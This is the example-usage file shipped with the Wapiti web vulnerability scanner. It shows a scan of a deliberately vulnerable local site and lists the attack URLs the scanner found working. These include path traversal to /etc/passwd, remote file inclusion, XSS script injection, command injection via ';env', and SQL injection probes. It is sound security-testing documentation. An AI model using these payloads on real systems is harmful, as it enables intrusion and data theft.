wapiti 2.2.1+dfsg-1 / usr / share / doc / wapiti / example.txt

This file is indexed.

/usr/share/doc/wapiti/example.txt is in wapiti 2.2.1+dfsg-1.

This file is owned by root:root, with mode 0o644.

The actual contents of the file can be viewed below. 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
First I use getcookie.py to login in the restricted area and get the cookie in cookies.txt

bash-3.0$ wapiti-getcookie cookies.txt http://127.0.0.1/vuln/?page=login
Please enter values for the folling form :
url = http://127.0.0.1/vuln/login.php
login (on) : toto
password (on) : toto
0 : <Cookie PHPSESSID=8qte5k7jr6ogkocrlcrk9obmj2 for 127.0.0.1/>

Then I scan the vuln website using the cookie and excluding the logout script

bash-3.0$ wapiti http://127.0.0.1/vuln/ -c cookies.txt -x http://127.0.0.1/vuln/index.php?page=logout
..........................

Attacking urls (GET)...
-----------------------
Warning fread (article) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?article=http%3A%2F%2Fwww.google.fr%2F&page=articles
Unix include/fread (article) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?article=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&page=articles
Warning require (page) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?article=plop.txt&page=http%3A%2F%2Fwww.google.fr%2F
Unix include/fread (page) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?article=plop.txt&page=%2Fetc%2Fpasswd%00
Unix include/fread (article) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?article=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&page=articles2
Warning require (page) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?article=truc.txt&page=http%3A%2F%2Fwww.google.fr%2F
Unix include/fread (page) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?article=truc.txt&page=%2Fetc%2Fpasswd%00
Warning require (page) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?page=http%3A%2F%2Fwww.google.fr%2F
Unix include/fread (page) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?page=%2Fetc%2Fpasswd%00
Warning require (page) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?var=plop&page=http%3A%2F%2Fwww.google.fr%2F
Unix include/fread (page) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?var=plop&page=%2Fetc%2Fpasswd%00
XSS (var) in http://127.0.0.1/vuln/
	Evil url: http://127.0.0.1/vuln/?var=%3Cscript%3Evar+wapiti_687474703a2f2f3132372e302e302e312f7e7369726975732f76756c6e2f_766172%3Dnew+Boolean%28%29%3B%3C%2Fscript%3E&page=xss
Command execution (var) in http://127.0.0.1/vuln/eval.php
	Evil url: http://127.0.0.1/vuln/eval.php?var=a%3Benv
500 HTTP Error code with
	Evil url: http://127.0.0.1/vuln/test.php?http%3A//www.google.fr/
500 HTTP Error code with
	Evil url: http://127.0.0.1/vuln/test.php?a%3Benv
500 HTTP Error code with
	Evil url: http://127.0.0.1/vuln/test.php?'"(
XSS (QUERY_STRING) in http://127.0.0.1/vuln/test.php
	Evil url: http://127.0.0.1/vuln/test.php?%3Cscript%3Evar%20wapiti_687474703a2f2f3132372e302e302e312f7e7369726975732f76756c6e2f746573742e706870_5155455259535452494e47%3Dnew%20Boolean%28%29%3B%3C/script%3E
MySQL Injection (user) in http://127.0.0.1/vuln/usermsg.php
	Evil url: http://127.0.0.1/vuln/usermsg.php?user=%27%22%28

Attacking forms (POST)...
-------------------------
SQL Injection found with http://127.0.0.1/vuln/login.php
  and params = login=%27%22%28&password=on
  coming from http://127.0.0.1/vuln/?page=login
SQL Injection found with http://127.0.0.1/vuln/login.php
  and params = login=on&password=%27%22%28
  coming from http://127.0.0.1/vuln/?page=login

Looking for permanent XSS
-------------------------

Upload scripts found :
----------------------
http://127.0.0.1/vuln/upload.php

APT Browse - Built by Thomas Orozco.